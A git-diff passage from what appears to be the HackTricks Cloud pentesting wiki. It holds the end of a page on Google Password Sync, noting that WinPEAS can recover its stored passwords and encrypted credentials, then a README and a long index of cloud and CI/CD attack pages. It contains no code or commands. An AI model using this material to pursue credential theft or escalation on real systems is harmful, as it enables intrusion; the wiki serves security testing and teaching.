GPS - Google Password Sync - -This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google. - -It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running). - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gps-google-password-sync.md" %} -[gps-google-password-sync.md](gps-google-password-sync.md) -{% endcontent-ref %} - -## Admin Directory Sync - -The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -Find more information about this in: - -{% content-ref url="gws-admin-directory-sync.md" %} -[gws-admin-directory-sync.md](gws-admin-directory-sync.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/src/README.md b/src/README.md new file mode 100644 index 000000000..e8b2b0355 --- /dev/null +++ b/src/README.md @@ -0,0 +1,36 @@ +# HackTricks Cloud + +Reading time: {{ #reading_time }} + +{{#include ./banners/hacktricks-training.md}} + +
+ +_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ + +> [!TIP] +> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. + +### **Pentesting CI/CD Methodology** + +**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** + +[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) + +### Pentesting Cloud Methodology + +**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** + +[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) + +### License & Disclaimer + +**Check them in:** + +[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) + +### Github Stats + +![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) + +{{#include ./banners/hacktricks-training.md}} diff --git a/src/SUMMARY.md b/src/SUMMARY.md new file mode 100644 index 000000000..f3c2f74f8 --- /dev/null +++ b/src/SUMMARY.md @@ -0,0 +1,503 @@ +# SUMMARY.md + +# 👽 Welcome! + +- [HackTricks Cloud](README.md) +- [About the Author$$external:https://book.hacktricks.xyz/welcome/about-the-author$$]() +- [HackTricks Values & faq$$external:https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq$$]() + +# 🏭 Pentesting CI/CD + +- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) +- [Github Security](pentesting-ci-cd/github-security/README.md) + - [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) + - [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) + - [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) + - [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) + - [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) + - [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) +- [Gitea Security](pentesting-ci-cd/gitea-security/README.md) + - [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) +- [Concourse Security](pentesting-ci-cd/concourse-security/README.md) + - [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) + - [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) + - [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) +- [CircleCI Security](pentesting-ci-cd/circleci-security.md) +- [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) + - [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) +- [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) + - [Basic Jenkins Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) + - [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) + - [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) + - [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) + - [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) + - [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) +- [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) + - [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) + - [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) +- [Terraform Security](pentesting-ci-cd/terraform-security.md) +- [Atlantis Security](pentesting-ci-cd/atlantis-security.md) +- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) + - [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) + - [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) +- [Okta Security](pentesting-ci-cd/okta-security/README.md) + - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) +- [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) +- [Supabase Security](pentesting-ci-cd/supabase-security.md) +- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) +- [Vercel Security](pentesting-ci-cd/vercel-security.md) +- [TODO](pentesting-ci-cd/todo.md) + +# ⛈️ Pentesting Cloud + +- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) +- [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md) + - [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) + - [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) + - [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) + - [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) + - [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) + - [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) + - [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) + - [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) + - [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) + - [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) + - [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) + - [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) + - [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) + - [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) + - [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) + - [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) + - [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) + - [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) + - [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) + - [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) + - [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) +- [GCP Pentesting](pentesting-cloud/gcp-security/README.md) + - [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) + - [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) + - [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) + - [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) + - [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) + - [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) + - [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) + - [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) + - [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) + - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) + - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) + - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) + - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) + - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) + - [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) + - [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) + - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) + - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) + - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) + - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) + - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) + - [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) + - [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) + - [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) + - [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) + - [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) + - [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) + - [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) + - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) + - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) + - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) + - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) + - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) + - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) + - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) + - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) + - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) + - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) + - [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) + - [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) + - [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) + - [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) + - [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) + - [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) + - [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) + - [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) + - [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) + - [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) + - [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) + - [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) + - [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) + - [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) + - [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) + - [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) + - [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) + - [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) + - [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) + - [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) + - [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) + - [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) + - [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) + - [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) + - [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) + - [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) + - [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) + - [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) + - [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) + - [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) + - [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) + - [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) + - [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) + - [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) + - [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) + - [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) + - [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) + - [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) + - [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) + - [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) + - [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) + - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) + - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) + - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) + - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) + - [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) + - [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) + - [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + - [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) + - [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) + - [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) + - [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) + - [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) + - [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) + - [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) + - [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) + - [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) + - [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) + - [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) + - [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) + - [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) + - [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) + - [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) + - [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) + - [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) + - [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) + - [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) + - [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) + - [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) + - [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) + - [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) + - [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) + - [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) + - [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) + - [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) +- [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) + - [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) + - [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) + - [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) + - [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) + - [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) + - [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) + - [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) + - [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) + - [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) +- [AWS Pentesting](pentesting-cloud/aws-security/README.md) + - [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) + - [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) + - [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) + - [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) + - [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) + - [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) + - [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) + - [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) + - [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) + - [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) + - [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) + - [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) + - [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) + - [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) + - [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) + - [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) + - [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) + - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) + - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) + - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) + - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) + - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) + - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) + - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) + - [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) + - [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) + - [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) + - [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) + - [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) + - [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) + - [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) + - [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) + - [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) + - [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) + - [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) + - [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) + - [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) + - [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) + - [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) + - [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) + - [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) + - [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) + - [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) + - [AWS - KMS Post 